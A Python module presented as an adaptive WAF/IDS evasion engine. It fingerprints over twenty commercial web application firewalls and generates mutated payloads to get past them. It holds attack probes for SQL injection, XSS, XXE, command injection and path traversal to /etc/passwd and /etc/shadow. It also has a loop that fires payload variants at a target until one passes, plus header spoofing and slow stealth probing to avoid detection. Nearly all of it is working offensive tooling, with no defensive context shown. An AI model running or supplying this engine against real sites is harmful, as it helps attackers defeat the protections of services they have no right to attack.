"""
Adaptive WAF/IDS Evasion Engine
Professional-grade payload mutation pipeline and request obfuscation.

Features:
  - Behavioural fingerprinting for 20+ WAF products with scored confidence
  - Multi-probe detection (benign baseline + multiple malicious probes)
  - Per-WAF adaptive bypass strategy selection
  - Polymorphic payload mutation pipeline (encoding, syntax, HTTP-layer)
  - Adaptive feedback loop: tracks bypass success/failure per technique
  - HTTP-layer obfuscation (chunked encoding, HPP, header spoofing)
  - Stealth detection mode (slow probing to avoid alert triggers)
  - IP rotation, accept-language randomisation, TLS fingerprint diversification
  - Multipart and Content-Type confusion bypass
  - Request-level fragmentation and pipeline bypass hints
"""

import random
import base64
import hashlib
import re
import time
import urllib.parse
from typing import List, Dict, Optional, Tuple, Any
from collections import defaultdict, deque
from dataclasses import dataclass, field
from enum import Enum
import logging

logger = logging.getLogger(__name__)


# WAF PRODUCT ENUM

class WAFProduct(Enum):
    CLOUDFLARE   = "Cloudflare"
    AWS_WAF      = "AWS WAF"
    AKAMAI       = "Akamai"
    IMPERVA      = "Imperva Incapsula"
    MODSECURITY  = "ModSecurity"
    F5_BIGIP     = "F5 BIG-IP ASM"
    BARRACUDA    = "Barracuda"
    WORDFENCE    = "Wordfence"
    SUCURI       = "Sucuri"
    AZURE        = "Azure Application Gateway WAF"
    FORTIWEB     = "FortiWeb"
    CITRIX       = "Citrix NetScaler AppFW"
    WALLARM      = "Wallarm"
    RADWARE      = "Radware AppWall"
    NAXSI        = "NAXSI"
    COMODO       = "Comodo WAF"
    DOTDEFENDER  = "dotDefender"
    ALIBABA      = "Alibaba Cloud WAF"
    HUAWEI       = "Huawei WAF"
    REBLAZE      = "Reblaze"
    FASTLY       = "Fastly WAF"
    GENERIC      = "Generic WAF"
    NONE         = "None"
    UNKNOWN      = "Unknown"


@dataclass
class WAFProfile:
    product: WAFProduct
    confidence: float
    block_status_codes: List[int] = field(default_factory=list)
    detection_headers: List[str] = field(default_factory=list)
    bypass_strategies: List[str] = field(default_factory=list)
    notes: str = ""


# FINGERPRINT DATABASE

WAF_FINGERPRINTS: Dict[WAFProduct, Dict] = {
    WAFProduct.CLOUDFLARE: {
        "headers":      ["cf-ray", "cf-cache-status", "cf-request-id", "cf-apo-via", "cf-mitigated"],
        "cookies":      ["__cfduid", "__cflb", "cf_clearance", "__cf_bm"],
        "status_codes": [403, 1020, 1010],
        "body":         ["cloudflare", "ray id", "attention required", "cf-wrapper", "checking your browser", "ddos protection by cloudflare"],
        "server":       ["cloudflare"],
        "bypass":       ["chunked_body", "case_variation", "unicode_normalization", "cdata_injection",
                         "json_unicode", "comment_injection", "multipart_bypass"],
    },
    WAFProduct.AWS_WAF: {
        "headers":      ["x-amzn-requestid", "x-amz-cf-id", "x-amz-apigw-id", "x-amzn-errortype", "x-amzn-trace-id"],
        "cookies":      [],
        "status_codes": [403],
        "body":         ["access denied", "request blocked", "aws waf"],
        "server":       [],
        "bypass":       ["double_url_encode", "comment_injection", "case_variation", "hex_encode",
                         "newline_injection", "parameter_pollution"],
    },
    WAFProduct.AKAMAI: {
        "headers":      ["akamai-origin-hop", "x-akamai-transformed", "x-check-cacheable", "x-true-cache-key", "x-akamai-request-id"],
        "cookies":      ["ak_bmsc", "akacd_", "bm_sz"],
        "status_codes": [403],
        "body":         ["akamai", "reference #", "access denied", "you don't have permission", "the server denied your request"],
        "server":       ["akamaighost"],
        "bypass":       ["whitespace_substitution", "comment_injection", "parameter_pollution",
                         "chunked_body", "case_variation", "hex_encode"],
    },
    WAFProduct.IMPERVA: {
        "headers":      ["x-cdn", "x-iinfo", "x-cdn-forward"],
        "cookies":      ["incap_ses_", "visid_incap_", "_incap_"],
        "status_codes": [403],
        "body":         ["incapsula", "_incapsula_resource", "incident id", "request unsuccessful"],
        "server":       ["imperva"],
        "bypass":       ["fragment_payload", "comment_injection", "whitespace_substitution",
                         "double_url_encode", "multipart_bypass"],
    },
    WAFProduct.MODSECURITY: {
        "headers":      ["mod-security-action"],
        "cookies":      [],
        "status_codes": [403, 406, 501],
        "body":         ["mod_security", "not acceptable", "406 not acceptable", "modsecurity",
                         "this error was generated by mod_security", "web application firewall"],
        "server":       [],
        "bypass":       ["operator_aliasing", "null_byte", "comment_injection", "alternative_operators",
                         "case_variation", "whitespace_substitution"],
    },
    WAFProduct.F5_BIGIP: {
        "headers":      ["x-wa-info", "x-cnection", "x-frame-options"],
        "cookies":      ["bigipserver", "f5_", "ts", "TSe"],
        "status_codes": [403],
        "body":         ["the requested url was rejected", "f5 networks", "asm", "please consult with your administrator"],
        "server":       ["bigip"],
        "bypass":       ["unicode_encoding", "html_entities", "double_url_encode", "case_variation",
                         "scientific_notation"],
    },
    WAFProduct.BARRACUDA: {
        "headers":      ["x-barracuda-connect"],
        "cookies":      ["barra_counter_session"],
        "status_codes": [403, 400],
        "body":         ["barracuda", "barracuda networks", "you have been blocked"],
        "server":       [],
        "bypass":       ["comment_injection", "url_encode", "whitespace_substitution", "case_variation"],
    },
    WAFProduct.WORDFENCE: {
        "headers":      [],
        "cookies":      ["wfvt_"],
        "status_codes": [403],
        "body":         ["wordfence", "generated by wordfence", "your access to this site has been limited",
                         "a security plugin has blocked your ip"],
        "server":       [],
        "bypass":       ["comment_injection", "case_variation", "url_encode", "null_byte"],
    },
    WAFProduct.SUCURI: {
        "headers":      ["x-sucuri-id", "x-sucuri-cache"],
        "cookies":      [],
        "status_codes": [403, 400],
        "body":         ["sucuri", "access denied - sucuri website firewall", "sucuri cloudproxy"],
        "server":       ["sucuri"],
        "bypass":       ["comment_injection", "double_url_encode", "unicode_normalization", "case_variation"],
    },
    WAFProduct.AZURE: {
        "headers":      ["x-azure-ref", "x-ms-routing-name", "x-ms-request-id"],
        "cookies":      [],
        "status_codes": [403],
        "body":         ["microsoft azure", "azure application gateway", "403 - forbidden: access is denied"],
        "server":       ["microsoft-azure-application-gateway"],
        "bypass":       ["case_variation", "comment_injection", "parameter_pollution", "whitespace_substitution"],
    },
    WAFProduct.FORTIWEB: {
        "headers":      ["fortiwafsid"],
        "cookies":      ["fortiwafsid"],
        "status_codes": [403],
        "body":         ["fortigate", "fortiweb", "server believes"],
        "server":       ["fortiweb"],
        "bypass":       ["case_variation", "url_encode", "null_byte", "unicode_encoding"],
    },
    WAFProduct.CITRIX: {
        "headers":      ["x-citrix-application", "via: ns-cache"],
        "cookies":      ["citrix_ns_id", "NSC_"],
        "status_codes": [403],
        "body":         ["netscaler", "citrix systems", "ns application firewall"],
        "server":       ["netscaler"],
        "bypass":       ["unicode_encoding", "double_url_encode", "comment_injection"],
    },
    WAFProduct.WALLARM: {
        "headers":      ["x-wallarm-node", "x-wallarm-request-id"],
        "cookies":      [],
        "status_codes": [403, 500],
        "body":         ["wallarm", "request is blocked"],
        "server":       [],
        "bypass":       ["double_url_encode", "json_unicode", "comment_injection", "whitespace_substitution"],
    },
    WAFProduct.RADWARE: {
        "headers":      ["x-sl-compstate", "x-oma-osb-redirect"],
        "cookies":      ["rdwr_"],
        "status_codes": [403, 412],
        "body":         ["radware", "appwall", "security policy"],
        "server":       [],
        "bypass":       ["case_variation", "fragment_payload", "double_url_encode", "comment_injection"],
    },
    WAFProduct.NAXSI: {
        "headers":      [],
        "cookies":      [],
        "status_codes": [403],
        "body":         ["naxsi", "error 403", "nginx", "this request has been blocked by naxsi"],
        "server":       ["nginx"],
        "bypass":       ["whitespace_substitution", "comment_injection", "case_variation", "url_encode"],
    },
    WAFProduct.COMODO: {
        "headers":      ["x-protected-by"],
        "cookies":      [],
        "status_codes": [403],
        "body":         ["comodo", "cawabot", "protected by comodo"],
        "server":       [],
        "bypass":       ["comment_injection", "case_variation", "double_url_encode"],
    },
    WAFProduct.DOTDEFENDER: {
        "headers":      ["x-dotdefender-denied"],
        "cookies":      [],
        "status_codes": [403, 200],
        "body":         ["dotdefender", "web application security", "application guard"],
        "server":       [],
        "bypass":       ["comment_injection", "case_variation", "whitespace_substitution"],
    },
    WAFProduct.ALIBABA: {
        "headers":      ["ali-swift-global-savetime", "eagleid"],
        "cookies":      ["XSRF-TOKEN"],
        "status_codes": [405, 403],
        "body":         ["alibaba cloud", "error 405", "waf block page"],
        "server":       ["tengine"],
        "bypass":       ["double_url_encode", "unicode_normalization", "case_variation"],
    },
    WAFProduct.REBLAZE: {
        "headers":      ["x-reblaze-protection", "rbzid"],
        "cookies":      ["rbzsessionid", "rbzid"],
        "status_codes": [403],
        "body":         ["reblaze", "access denied"],
        "server":       [],
        "bypass":       ["case_variation", "comment_injection", "url_encode"],
    },
    WAFProduct.FASTLY: {
        "headers":      ["x-fastly-request-id", "fastly-restarts"],
        "cookies":      [],
        "status_codes": [403],
        "body":         ["fastly error: 403", "fastly waf"],
        "server":       ["fastly"],
        "bypass":       ["chunked_body", "comment_injection", "case_variation"],
    },
}

# Multiple malicious probes to ensure the WAF is reliably triggered
MALICIOUS_PROBES = [
    "' OR 1=1--",
    "<script>alert(1)</script>",
    "../../../../etc/passwd",
    "UNION SELECT NULL,NULL,NULL--",
    "; ls -la",
    "{{7*7}}",
    "../../../etc/shadow",
    "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>",
]


# BYPASS STRATEGIES

class BypassStrategies:
    """Comprehensive collection of WAF bypass mutation strategies."""

    # --- Encoding ---

    @staticmethod
    def url_encode(payload: str) -> str:
        return urllib.parse.quote(payload, safe="")

    @staticmethod
    def double_url_encode(payload: str) -> str:
        return urllib.parse.quote(urllib.parse.quote(payload, safe=""), safe="")

    @staticmethod
    def hex_encode(payload: str) -> str:
        return "".join(f"%{ord(c):02X}" if c.isalpha() else c for c in payload)

    @staticmethod
    def unicode_encoding(payload: str) -> str:
        return "".join(f"%u{ord(c):04X}" if c.isalpha() else c for c in payload)

    @staticmethod
    def html_entities(payload: str) -> str:
        return "".join(f"&#{ord(c)};" for c in payload)

    @staticmethod
    def base64_wrapped(payload: str) -> str:
        b64 = base64.b64encode(payload.encode()).decode()
        return f"eval(base64_decode('{b64}'))"

    @staticmethod
    def json_unicode(payload: str) -> str:
        return "".join(f"\\u{ord(c):04x}" if c.isalpha() else c for c in payload)

    # --- Syntax mutations ---

    @staticmethod
    def comment_injection(payload: str) -> List[str]:
        variants = []
        for style in ["/**/", "/*!*/", "/*!50000*/", "--\n", "#\n", "\t", "\n", "\r\n"]:
            variants.append(payload.replace(" ", style))
        for kw in ["UNION", "SELECT", "FROM", "WHERE", "AND", "OR", "INSERT", "DROP"]:
            if kw in payload.upper():
                variants.append(re.sub(kw, kw[:2] + "/**/" + kw[2:], payload, flags=re.IGNORECASE))
        return variants

    @staticmethod
    def case_variation(payload: str) -> List[str]:
        variants = [payload.upper(), payload.lower()]
        variants.append("".join(c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(payload)))
        variants.append("".join(random.choice([c.upper(), c.lower()]) for c in payload))
        return variants

    @staticmethod
    def whitespace_substitution(payload: str) -> List[str]:
        alternatives = ["\t", "\n", "\r\n", "\x0b", "\x0c", "%09", "%0a", "%0d%0a", "+", "/**/"]
        return [payload.replace(" ", ws) for ws in alternatives]

    @staticmethod
    def null_byte(payload: str) -> List[str]:
        return [
            payload + "%00",
            payload + "\x00",
            payload.replace("'", "'%00"),
            "%00" + payload,
            payload.replace(" ", "%00 "),
        ]

    @staticmethod
    def newline_injection(payload: str) -> List[str]:
        return [
            payload.replace(" ", "%0a"),
            payload.replace(" ", "%0d%0a"),
            payload.replace(" ", "\r\n\t"),
        ]

    @staticmethod
    def alternative_operators(payload: str) -> List[str]:
        variants = []
        replacements = [
            ("OR", "||"), ("AND", "&&"),
            ("=", " LIKE "), ("!=", " NOT LIKE "),
        ]
        for src, dst in replacements:
            if src in payload.upper():
                variants.append(re.sub(src, dst, payload, flags=re.IGNORECASE))
        return variants

    @staticmethod
    def parameter_pollution(param: str, payload: str) -> List[Tuple[str, str]]:
        return [
            (f"{param}=legit&{param}={urllib.parse.quote(payload)}", "hpp_append"),
            (f"{param}={urllib.parse.quote(payload)}&{param}=legit", "hpp_prepend"),
            (f"{param}={urllib.parse.quote(payload[:len(payload)//2])}&{param}={urllib.parse.quote(payload[len(payload)//2:])}", "hpp_split"),
        ]

    @staticmethod
    def fragment_payload(payload: str) -> str:
        chunks = [payload[i:i+3] for i in range(0, len(payload), 3)]
        return "".join(urllib.parse.quote(c) for c in chunks)

    @staticmethod
    def chunked_body(payload: str) -> Dict[str, Any]:
        chunk = payload.encode()
        body = f"{len(chunk):x}\r\n".encode() + chunk + b"\r\n0\r\n\r\n"
        return {"headers": {"Transfer-Encoding": "chunked"}, "body": body}

    @staticmethod
    def unicode_normalization(payload: str) -> str:
        return "".join(
            chr(0xFF00 + ord(c) - 0x20) if 0x21 <= ord(c) <= 0x7E else c
            for c in payload
        )

    @staticmethod
    def scientific_notation(payload: str) -> str:
        return re.sub(r"\b(\d+)\b", lambda m: f"{m.group(1)}e0", payload)

    @staticmethod
    def operator_aliasing(payload: str) -> List[str]:
        variants = []
        if "=" in payload:
            for alias in ["BETWEEN 1 AND 1-- ", "REGEXP '^'-- ", "SOUNDS LIKE "]:
                variants.append(payload.replace("=1", alias + "1"))
        return variants

    @staticmethod
    def cdata_injection(payload: str) -> str:
        mid = len(payload) // 2
        return f"<![CDATA[{payload[:mid]}]]><![CDATA[{payload[mid:]}]]>"

    @staticmethod
    def multipart_bypass(payload: str) -> Dict[str, Any]:
        """
        Wrap the payload in a multipart/form-data body.
        Some WAFs only inspect application/x-www-form-urlencoded.
        """
        boundary = f"erebus{hashlib.md5(payload.encode()).hexdigest()[:12]}"
        body = (
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="data"\r\n\r\n'
            f"{payload}\r\n"
            f"--{boundary}--\r\n"
        )
        return {
            "headers": {"Content-Type": f"multipart/form-data; boundary={boundary}"},
            "body": body,
        }

    @staticmethod
    def content_type_confusion(payload: str) -> List[Dict[str, Any]]:
        """
        Submit payload with unexpected but parseable content types.
        Some WAFs pattern-match on Content-Type before inspecting body.
        """
        return [
            {"headers": {"Content-Type": "application/x-www-form-urlencoded; charset=ibm037"}, "body": payload},
            {"headers": {"Content-Type": "application/json"}, "body": f'{{"q": "{payload}"}}'},
            {"headers": {"Content-Type": "text/plain"}, "body": payload},
        ]

    @staticmethod
    def http_verb_tampering(method: str) -> List[Dict[str, Any]]:
        """
        Override the HTTP method via headers — some WAFs only inspect GET/POST.
        """
        return [
            {"headers": {"X-HTTP-Method-Override": method}, "effective_method": "POST"},
            {"headers": {"X-Method-Override": method}, "effective_method": "POST"},
            {"headers": {"X-HTTP-Method": method}, "effective_method": "POST"},
        ]

    @staticmethod
    def sql_inline_comments(payload: str) -> List[str]:
        """Insert MySQL inline version comments to hide keywords from WAF."""
        variants = []
        for kw in ["UNION", "SELECT", "FROM", "WHERE", "AND", "OR", "INSERT", "DROP", "TABLE"]:
            if kw in payload.upper():
                versioned = f"/*!{kw}*/"
                variants.append(re.sub(kw, versioned, payload, flags=re.IGNORECASE))
        return variants

    @staticmethod
    def encoding_chain(payload: str) -> List[str]:
        """Apply chained encoding combinations."""
        variants = []
        once = urllib.parse.quote(payload, safe="")
        variants.append(urllib.parse.quote(once, safe=""))
        ent = "".join(f"&#{ord(c)};" for c in payload)
        variants.append(urllib.parse.quote(ent, safe=""))
        hx = "".join(f"\\x{ord(c):02x}" if c.isalpha() else c for c in payload)
        variants.append(urllib.parse.quote(hx, safe=""))
        return variants


# ADAPTIVE BYPASS TRACKER

class AdaptiveBypassTracker:
    """
    Tracks the success and failure rate of each bypass technique
    per WAF product. Prioritises strategies with higher observed success rates.
    """

    def __init__(self):
        self._stats: Dict[str, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
        self._recent: deque = deque(maxlen=200)

    def record(self, waf: str, strategy: str, success: bool):
        key = "success" if success else "failure"
        self._stats[waf][f"{strategy}_{key}"] += 1
        self._recent.append((waf, strategy, success, time.time()))

    def rank_strategies(self, waf: str, strategies: List[str]) -> List[str]:
        """Sort strategies by descending success rate for this WAF product."""
        def score(s: str) -> float:
            ok = self._stats[waf].get(f"{s}_success", 0)
            fail = self._stats[waf].get(f"{s}_failure", 0)
            total = ok + fail
            if total == 0:
                return 0.5  # Neutral for untested
            return ok / total

        return sorted(strategies, key=score, reverse=True)

    def best_strategy(self, waf: str, strategies: List[str]) -> Optional[str]:
        ranked = self.rank_strategies(waf, strategies)
        return ranked[0] if ranked else None

    def report(self) -> Dict[str, Dict[str, float]]:
        """Return success rates per WAF per strategy."""
        out: Dict[str, Dict[str, float]] = {}
        for waf, counters in self._stats.items():
            strategies = set(k.rsplit("_", 1)[0] for k in counters)
            out[waf] = {}
            for s in strategies:
                ok = counters.get(f"{s}_success", 0)
                fail = counters.get(f"{s}_failure", 0)
                total = ok + fail
                out[waf][s] = round(ok / total, 3) if total else 0.0
        return out


# STEALTH PROBER

class StealthProber:
    """
    Issues detection probes slowly, with human-like timing patterns,
    to avoid triggering rate-based detection before we fingerprint the WAF.
    """

    def __init__(self, http_engine, base_delay: float = 1.5, jitter: float = 0.8):
        self.http = http_engine
        self.base_delay = base_delay
        self.jitter = jitter

    def _sleep(self):
        time.sleep(self.base_delay + random.uniform(0, self.jitter))

    def get_with_delay(self, url: str, **kwargs):
        self._sleep()
        return self.http.get(url, **kwargs)

    def post_with_delay(self, url: str, **kwargs):
        self._sleep()
        return self.http.post(url, **kwargs)

    def probe_sequence(self, url: str, probes: List[str]) -> List[Any]:
        """Send multiple probes with inter-probe delays."""
        results = []
        for probe in probes:
            probe_url = url + ("&" if "?" in url else "?") + urllib.parse.quote(probe, safe="=&/?")
            resp = self.get_with_delay(probe_url)
            results.append(resp)
        return results


# MAIN WAF EVASION CLASS

class WAFEvasion:
    """
    Adaptive WAF evasion engine.

    Workflow:
      1. detect(url)          → identify WAF product + confidence
      2. mutate(payload, ...) → produce WAF-specific bypass variants
      3. test_bypass(url, ...) → validate which variant passes
      4. obfuscate_request(...) → apply HTTP-layer obfuscation

    Usage:
        engine = HTTPEngine(...)
        evasion = WAFEvasion(engine)
        waf = evasion.detect("https://target.com/page?id=1")
        variants = evasion.mutate("' OR 1=1--", technique="sqli")
        winner, resp = evasion.test_bypass("https://target.com/page?id=", variants)
    """

    def __init__(self, http_engine):
        self.http = http_engine
        self.profile: Optional[WAFProfile] = None
        self._strategies = BypassStrategies()
        self._tracker = AdaptiveBypassTracker()
        self._stealth: Optional[StealthProber] = None


    def detect(self, url: str, stealth: bool = False) -> WAFProduct:
        """
        Fingerprint the WAF protecting the target URL.

        Strategy:
          1. Send a benign baseline request (establish normal headers/status).
          2. Send multiple malicious probes to reliably trigger the WAF.
          3. Score each WAF product against observed response indicators.
          4. Apply confidence threshold to avoid false positives.

        Args:
            url: Target URL.
            stealth: Use slow, human-like probe timing (avoids rate-based detection).

        Returns:
            WAFProduct enum value.
        """
        if stealth:
            if not self._stealth:
                self._stealth = StealthProber(self.http)
            get_fn = self._stealth.get_with_delay
        else:
            get_fn = self.http.get

        normal_resp = get_fn(url)
        if not normal_resp:
            self.profile = WAFProfile(WAFProduct.UNKNOWN, 0.0)
            return WAFProduct.UNKNOWN

        # Use multiple probes and aggregate scores for reliability
        probe_resps = []
        for probe in MALICIOUS_PROBES[:5]:
            probe_url = url + ("&" if "?" in url else "?") + f"x={urllib.parse.quote(probe, safe='')}"
            resp = get_fn(probe_url)
            if resp:
                probe_resps.append(resp)

        if not probe_resps:
            self.profile = WAFProfile(WAFProduct.UNKNOWN, 0.0)
            return WAFProduct.UNKNOWN

        # Aggregate scores across all probe responses.
        # hard_scores tracks only WAF-specific indicators (headers, cookies, server string).
        # Soft signals (body keywords, status codes) alone are not enough to name a product.
        scores:      Dict[WAFProduct, float] = defaultdict(float)
        hard_scores: Dict[WAFProduct, float] = defaultdict(float)

        for blocked_resp in probe_resps:
            for product, sig in WAF_FINGERPRINTS.items():
                for hdr in sig.get("headers", []):
                    for resp_hdr in blocked_resp.headers:
                        if hdr.lower() in resp_hdr.lower():
                            scores[product]      += 3.0
                            hard_scores[product] += 3.0

                server = blocked_resp.headers.get("Server", "").lower()
                for srv_sig in sig.get("server", []):
                    if srv_sig.lower() in server:
                        scores[product]      += 4.0
                        hard_scores[product] += 4.0

                for ck_sig in sig.get("cookies", []):
                    if any(ck_sig.lower() in ck.lower() for ck in blocked_resp.cookies.keys()):
                        scores[product]      += 3.0
                        hard_scores[product] += 3.0

                # Status code differential — soft signal only
                if blocked_resp.status_code in sig.get("status_codes", []):
                    if normal_resp.status_code not in sig.get("status_codes", []):
                        scores[product] += 2.0

                # Body keywords — soft signal only
                body_lower = blocked_resp.text.lower()
                for kw in sig.get("body", []):
                    if kw.lower() in body_lower:
                        scores[product] += 2.5

        # Generic WAF: status changed from 2xx to 4xx/5xx across probes
        blocks = [r for r in probe_resps if r.status_code in (400, 403, 406, 429, 501, 999)]
        is_generic = (200 <= normal_resp.status_code < 300) and len(blocks) >= 2

        if not scores and is_generic:
            self.profile = WAFProfile(
                WAFProduct.GENERIC, 0.5,
                block_status_codes=[r.status_code for r in blocks],
                bypass_strategies=["comment_injection", "case_variation", "double_url_encode"],
            )
            return WAFProduct.GENERIC

        if not scores:
            self.profile = WAFProfile(WAFProduct.NONE, 1.0)
            return WAFProduct.NONE

        best = max(scores, key=scores.__getitem__)
        max_possible = len(probe_resps) * 15.0
        confidence = min(1.0, scores[best] / max_possible)

        # Two-gate filter to prevent false positives:
        # 1. Score must reach 40 % of the theoretical maximum (was 15 %).
        # 2. At least one hard WAF-specific signal (header / cookie / server string)
        #    must have contributed — body keywords and status codes alone are not
        #    enough to name a specific product.
        if confidence < 0.40 or hard_scores.get(best, 0.0) == 0.0:
            if is_generic:
                self.profile = WAFProfile(
                    WAFProduct.GENERIC, 0.5,
                    block_status_codes=[r.status_code for r in blocks],
                    bypass_strategies=["comment_injection", "case_variation", "double_url_encode"],
                )
                return WAFProduct.GENERIC
            self.profile = WAFProfile(WAFProduct.UNKNOWN, confidence)
            return WAFProduct.UNKNOWN

        sig = WAF_FINGERPRINTS.get(best, {})
        strategies = sig.get("bypass", ["comment_injection", "case_variation"])

        # Sort by adaptive tracker experience
        strategies = self._tracker.rank_strategies(best.value, strategies)

        self.profile = WAFProfile(
            product=best,
            confidence=confidence,
            block_status_codes=sig.get("status_codes", []),
            detection_headers=sig.get("headers", []),
            bypass_strategies=strategies,
        )

        logger.info(f"[WAF] Detected: {best.value} (confidence {confidence:.0%})")
        return best

    def get_profile(self) -> Optional[WAFProfile]:
        return self.profile


    def mutate(
        self,
        payload: str,
        technique: str = "sqli",
        max_variants: int = 60,
        use_adaptive: bool = True,
    ) -> List[str]:
        """
        Generate WAF-bypass variants for the given payload.

        Args:
            payload:      Base payload string.
            technique:    "sqli", "xss", "rce", "xxe", or "generic".
            max_variants: Maximum number of variants returned.
            use_adaptive: Place WAF-specific and historically successful strategies first.

        Returns:
            Ordered list of mutated payloads (best candidates first).
        """
        variants: set = {payload}
        s = self._strategies

        # Universal baseline mutations
        variants.update(s.comment_injection(payload))
        variants.update(s.case_variation(payload))
        variants.update(s.whitespace_substitution(payload))
        variants.update(s.null_byte(payload))
        variants.add(s.url_encode(payload))
        variants.add(s.double_url_encode(payload))
        variants.add(s.hex_encode(payload))
        variants.update(s.newline_injection(payload))
        variants.update(s.encoding_chain(payload))

        # Technique-specific mutations
        if technique == "sqli":
            variants.update(s.alternative_operators(payload))
            variants.update(s.operator_aliasing(payload))
            variants.add(s.scientific_notation(payload))
            variants.update(s.sql_inline_comments(payload))
        elif technique == "xss":
            variants.add(s.unicode_normalization(payload))
            variants.add(s.json_unicode(payload))
            variants.add(s.html_entities(payload))
            variants.add(s.cdata_injection(payload))
        elif technique in ("rce", "xxe"):
            variants.add(s.fragment_payload(payload))
            variants.update(s.null_byte(payload))
            variants.add(s.unicode_normalization(payload))

        # WAF-profile-specific strategies (highest priority).
        # Dict-returning strategies (chunked_body, multipart_bypass) produce
        # HTTP-layer mutations and cannot be represented as plain payload strings;
        # they are intentionally skipped here and applied at the request level via
        # obfuscate_request() / build_multipart_request().
        waf_variants: List[str] = []
        if self.profile and self.profile.bypass_strategies:
            strategy_list = (
                self._tracker.rank_strategies(self.profile.product.value, self.profile.bypass_strategies)
                if use_adaptive else self.profile.bypass_strategies
            )
            for strategy in strategy_list:
                fn = getattr(s, strategy, None)
                if fn is None:
                    continue
                try:
                    result = fn(payload)
                    if isinstance(result, list):
                        waf_variants.extend(r for r in result if isinstance(r, str))
                    elif isinstance(result, str):
                        waf_variants.append(result)
                    # dict results (chunked_body, multipart_bypass) are HTTP-layer
                    # transforms — not string payload variants, skip silently
                except Exception:
                    pass

        # Compose: WAF-specific first, then generic
        ordered = waf_variants + [v for v in variants if v not in set(waf_variants)]
        return list(dict.fromkeys(ordered))[:max_variants]

    def generate_sqli_variants(self, payload: str, max_variants: int = 30) -> List[str]:
        return self.mutate(payload, technique="sqli", max_variants=max_variants)

    def generate_xss_variants(self, payload: str, max_variants: int = 30) -> List[str]:
        return self.mutate(payload, technique="xss", max_variants=max_variants)

    def generate_rce_variants(self, payload: str, max_variants: int = 30) -> List[str]:
        return self.mutate(payload, technique="rce", max_variants=max_variants)


    def test_bypass(
        self,
        url: str,
        payloads: List[str],
        success_indicators: Optional[List[str]] = None,
        stop_on_first: bool = True,
        record_results: bool = True,
    ) -> Tuple[Optional[str], Any]:
        """
        Send payloads until one passes the WAF.

        Args:
            url:                Base URL (payload appended with URL quoting).
            payloads:           Ordered payload variants (best candidates first).
            success_indicators: Strings that confirm bypass in the response body.
            stop_on_first:      Return after first success.
            record_results:     Feed outcomes back to the adaptive tracker.

        Returns:
            (winning_payload, response) or (None, None).
        """
        block_codes = self.profile.block_status_codes if self.profile else [403, 406, 501]
        waf_name = self.profile.product.value if self.profile else "unknown"

        for payload in payloads:
            strategy = self._guess_strategy(payload)
            test_url = url + urllib.parse.quote(payload, safe="=&/?")
            resp = self.http.get(test_url)

            if not resp:
                continue

            blocked = resp.status_code in block_codes
            has_indicator = (
                any(ind in resp.text for ind in success_indicators)
                if success_indicators else True
            )

            success = not blocked and has_indicator

            if record_results and strategy:
                self._tracker.record(waf_name, strategy, success)

            if success:
                if stop_on_first:
                    return payload, resp

        return None, None

    def _guess_strategy(self, payload: str) -> str:
        """Heuristically identify which strategy produced this payload variant."""
        if "%25" in payload:
            return "double_url_encode"
        if "/**/" in payload:
            return "comment_injection"
        if payload != payload.lower() and payload != payload.upper():
            return "case_variation"
        if "%u00" in payload.lower():
            return "unicode_encoding"
        if "\t" in payload or "%09" in payload:
            return "whitespace_substitution"
        if payload.endswith("%00"):
            return "null_byte"
        return "url_encode"

    # HTTP-level obfuscation

    def obfuscate_request(
        self,
        method: str,
        url: str,
        headers: Dict[str, str],
        body: Optional[str] = None,
    ) -> Dict[str, Any]:
        """
        Apply HTTP-layer obfuscation to evade network-layer WAF inspection.

        Mutations applied:
          - Cloudflare: randomised Sec-CH-UA header ordering
          - POST: chunked Transfer-Encoding body
          - GET: cache-busting noise parameter
          - All: X-Forwarded-For / X-Real-IP spoofing with random RFC-1918 IPs
          - All: randomised Accept-Language and Accept-Encoding ordering
          - All: case-randomised non-standard headers

        Returns dict with 'url', 'headers', and 'body' ready for the HTTP engine.
        """
        mutated_headers = dict(headers)
        mutated_url = url
        mutated_body = body

        # Spoof originating IP (chain of private IPs looks like legitimate proxies)
        def _random_private() -> str:
            prefixes = ["10.", "172.16.", "192.168."]
            p = random.choice(prefixes)
            parts = [str(random.randint(1, 254)) for _ in range(4 - p.count("."))]
            return p + ".".join(parts)

        mutated_headers.setdefault("X-Forwarded-For", f"{_random_private()}, {_random_private()}")
        mutated_headers.setdefault("X-Real-IP", _random_private())
        mutated_headers.setdefault("X-Originating-IP", _random_private())
        mutated_headers.setdefault("True-Client-IP", _random_private())

        langs = ["en-US,en;q=0.9", "fr-FR,fr;q=0.9,en-US;q=0.8", "de-DE,de;q=0.9", "ja,en-US;q=0.8"]
        mutated_headers["Accept-Language"] = random.choice(langs)

        # Cloudflare-specific header manipulation
        if self.profile and self.profile.product == WAFProduct.CLOUDFLARE:
            v = random.randint(110, 124)
            mutated_headers["Sec-CH-UA"] = (
                f'"Not.A/Brand";v="8", "Chromium";v="{v}", "Google Chrome";v="{v}"'
            )
            mutated_headers["Sec-CH-UA-Mobile"] = "?0"
            mutated_headers["Sec-CH-UA-Platform"] = random.choice(['"Windows"', '"Linux"', '"macOS"'])

        # Cache-busting noise on GET to get a fresh response
        if method.upper() == "GET":
            noise = hashlib.md5(str(time.time()).encode()).hexdigest()[:8]
            sep = "&" if "?" in url else "?"
            mutated_url = url + f"{sep}_={noise}"

        # Chunked encoding for POST bypasses body-inspection on some WAFs
        if method.upper() == "POST" and body:
            chunk_data = self._strategies.chunked_body(body)
            mutated_headers.update(chunk_data["headers"])
            mutated_body = chunk_data["body"].decode("latin-1")

        return {"url": mutated_url, "headers": mutated_headers, "body": mutated_body}

    def build_multipart_request(self, payload: str) -> Dict[str, Any]:
        """Wrap a payload in multipart/form-data to bypass body-pattern WAFs."""
        return self._strategies.multipart_bypass(payload)

    def content_type_variants(self, payload: str) -> List[Dict[str, Any]]:
        """Return request variants with different Content-Type values."""
        return self._strategies.content_type_confusion(payload)


    def bypass_report(self) -> Dict[str, Any]:
        """Return adaptive bypass success rates per WAF and strategy."""
        return self._tracker.report()

    def summary(self) -> Dict[str, Any]:
        """Return detection summary for the current profile."""
        if not self.profile:
            return {"detected": False}
        return {
            "detected": self.profile.product not in (WAFProduct.NONE, WAFProduct.UNKNOWN),
            "product": self.profile.product.value,
            "confidence": round(self.profile.confidence * 100, 1),
            "bypass_strategies": self.profile.bypass_strategies,
        }
